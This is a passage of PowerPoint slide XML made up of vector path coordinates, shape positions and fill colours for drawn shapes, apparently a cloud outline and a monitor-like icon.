                    <a:pt x="2224402" y="2562290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2267088" y="2562290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2314517" y="2567035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2376174" y="2562290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2433088" y="2557545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2490002" y="2548055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546917" y="2533820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2594345" y="2519585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2646517" y="2500605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2689203" y="2481625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2736631" y="2457900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2774574" y="2434175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2807774" y="2400961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840974" y="2372491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2869431" y="2344021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2893146" y="2306061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2921603" y="2234886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2931089" y="2196926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954803" y="2201671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2973774" y="2206416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3054403" y="2206416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082860" y="2201671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3116060" y="2196926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3144517" y="2187436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3172975" y="2173201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3220403" y="2144731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3239375" y="2121007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3263089" y="2102027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3282060" y="2083047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3296289" y="2059322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3305775" y="2030852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3320003" y="2007127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3329489" y="1978657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3334232" y="1950187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3334232" y="1921717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3329489" y="1883757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3324746" y="1850543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3357946" y="1855288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3395889" y="1860033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3429089" y="1864778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3467032" y="1864778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3571375" y="1855288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3623547" y="1841053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3670975" y="1826818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3718404" y="1807838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3761090" y="1784113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3836975" y="1727173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3903375" y="1660743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927090" y="1618038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3950804" y="1580079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3969776" y="1537374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3988747" y="1442474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3993490" y="1395024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3988747" y="1347574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3979261" y="1300125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3969776" y="1257420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3950804" y="1214715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927090" y="1172010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3903375" y="1134050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3870175" y="1096090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3836975" y="1062876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3799032" y="1034406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3761090" y="1010681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3718404" y="982211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3670975" y="963231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3623547" y="948996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3571375" y="934761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3467032" y="925271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433832" y="930016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3400632" y="930016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3367432" y="934761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3334232" y="944251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3334232" y="820881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3329489" y="782922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3324746" y="749707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3315260" y="716492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3305775" y="688022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3296289" y="654807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3267832" y="588377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3239375" y="531438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3220403" y="502968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3201432" y="479243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3182460" y="450773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3158746" y="427048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3139775" y="403323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3116060" y="379598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3092346" y="360618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3068632" y="336893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3011717" y="298933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2926346" y="256229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2864688" y="232504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2798288" y="213524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698688" y="199289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2665488" y="199289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2603831" y="204034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546917" y="208779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2490002" y="227759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2433088" y="241994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2328745" y="289443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2286059" y="322658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2238631" y="355873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2191202" y="279953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2162745" y="246739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2134288" y="208779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2067888" y="151839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2029945" y="123369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1987259" y="94899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1944573" y="75919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1906630" y="56939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1859202" y="37959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1816516" y="23724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1769087" y="9489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1674230" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CFD7D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3CB0E217-4092-E3FE-94FB-5D35306542B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7228" y="1996141"/>
              <a:ext cx="3761090" cy="2358256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22986920-6394-BC37-4C1B-FFC9EEFFBCF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3914" y="1913870"/>
              <a:ext cx="4050531" cy="2616199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C1DAD29C-BA25-AAD4-7E85-22E2874A827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6187" y="3198788"/>
              <a:ext cx="492560" cy="727709"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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6170B339-E345-8F72-CCAD-094701D03C2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0318" y="3373322"/>
              <a:ext cx="525124" cy="603045"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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E45659A4-F1FD-363A-541C-0F7C57CC78E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6130318" y="3373322"/>
              <a:ext cx="525145" cy="603250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="525145" h="603250">
                  <a:moveTo>
                    <a:pt x="424936" y="562112"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="198073" y="603045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103643" y="571336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103643" y="558076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179072" y="543663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179072" y="514260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20152" y="542510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="534439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="89361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504395" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525124" y="8071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525124" y="451995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310928" y="490623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310928" y="520025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329354" y="515990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424936" y="550005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424936" y="562112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69C2A96E-AC46-D87B-A8B3-6E55A16AB68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2810" y="3874899"/>
              <a:ext cx="320717" cy="102621"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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F502A338-7F7B-F58C-EC96-EA208D87BD93}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6130318" y="3463260"/>
              <a:ext cx="27940" cy="451484"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="27939" h="451485">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="440465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27638" y="451419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27638" y="10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2692AD8F-57FC-FA9F-EFC3-C301DB3C9F91}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6151047" y="3384852"/>
              <a:ext cx="506095" cy="528320"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="506095" h="528320">
                  <a:moveTo>
                    <a:pt x="505547" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="89361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="528097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505547" y="438159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5055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C2B33D77-8C51-9069-008C-19506DA746E7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6147880" y="3381070"/>
              <a:ext cx="512445" cy="535940"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="512445" h="535939">
                  <a:moveTo>
                    <a:pt x="511877" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="90483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="535662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21268" y="531879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="531879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2612" y="528756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="528094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="96264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3717" y="96264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="93143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21373" y="93143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505543" y="7561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505543" y="3782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511877" y="3782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511877" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="512445" h="535939">
                  <a:moveTo>
                    <a:pt x="6333" y="528094"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2612" y="528756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="531879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="528094"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="512445" h="535939">
                  <a:moveTo>
                    <a:pt x="505543" y="439286"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6333" y="528094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="531879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21268" y="531879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511877" y="444601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511877" y="441941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505543" y="441941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505543" y="439286"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="512445" h="535939">
                  <a:moveTo>
                    <a:pt x="508161" y="438820"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="505543" y="439286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505543" y="441941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508161" y="438820"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="512445" h="535939">
                  <a:moveTo>
                    <a:pt x="511877" y="438820"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="508161" y="438820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505543" y="441941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511877" y="441941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511877" y="438820"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="512445" h="535939">
                  <a:moveTo>
                    <a:pt x="511877" y="3782"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="505543" y="3782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509267" y="6902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505543" y="7561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505543" y="439286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508161" y="438820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511877" y="438820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511877" y="3782"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="512445" h="535939">
                  <a:moveTo>
                    <a:pt x="6333" y="93143"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3717" y="96264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="95801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="93143"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="512445" h="535939">
                  <a:moveTo>
                    <a:pt x="6333" y="95801"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3717" y="96264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="96264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="95801"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="512445" h="535939">
                  <a:moveTo>
                    <a:pt x="21373" y="93143"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6333" y="93143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="95801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21373" y="93143"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="512445" h="535939">
                  <a:moveTo>
                    <a:pt x="505543" y="3782"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="505543" y="7561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509267" y="6902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505543" y="378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05EB49C1-B203-4FFC-E733-97E8E315A7AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6201716" y="3434434"/>
              <a:ext cx="414020" cy="426084"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="414020" h="426085">
                  <a:moveTo>
                    <a:pt x="413420" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="73218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="425475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413420" y="351680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413420" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="1B3D6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DBAFFBCE-8A01-8E3F-3947-62E2F7BF71D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1846" y="3836848"/>
              <a:ext cx="107097" cy="94550"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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7D4016B1-16C8-C79D-3FDF-DBFFDE966516}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6123696" y="3366473"/>
              <a:ext cx="538480" cy="617220"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="176189" y="545069"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="103639" y="559481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103639" y="582954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204195" y="616720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276867" y="603608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206798" y="603608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203520" y="603369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205189" y="603068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131089" y="578185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="578185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112368" y="571899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="571899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="571428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111554" y="571428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="564925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144287" y="564925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189432" y="555956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189432" y="550512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176189" y="550512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176189" y="545069"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="205189" y="603068"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="203520" y="603369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206798" y="603608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205189" y="603068"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="424932" y="563419"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="205189" y="603068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206798" y="603608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276867" y="603608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438175" y="574503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438175" y="568961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424932" y="568961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424932" y="563419"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="112368" y="571899"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="116882" y="578185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="573415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112368" y="571899"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="116882" y="573415"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="116882" y="578185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131089" y="578185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="573415"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="116882" y="571899"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="112368" y="571899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="573415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="571899"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="116882" y="564925"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="111554" y="571428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="570370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="564925"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="116882" y="570370"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="111554" y="571428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="571428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="570370"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="144287" y="564925"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="116882" y="564925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="570370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144287" y="564925"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="428449" y="562784"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="424932" y="563419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424932" y="568961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429827" y="563101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429339" y="563101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428449" y="562784"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="438175" y="562435"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="430383" y="562435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424932" y="568961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438175" y="568961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438175" y="562435"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="424932" y="561533"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="424932" y="563419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428449" y="562784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424932" y="561533"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="424932" y="556854"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="424932" y="561533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429339" y="563101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424932" y="556854"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="430091" y="562784"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="429115" y="562784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429339" y="563101"/>
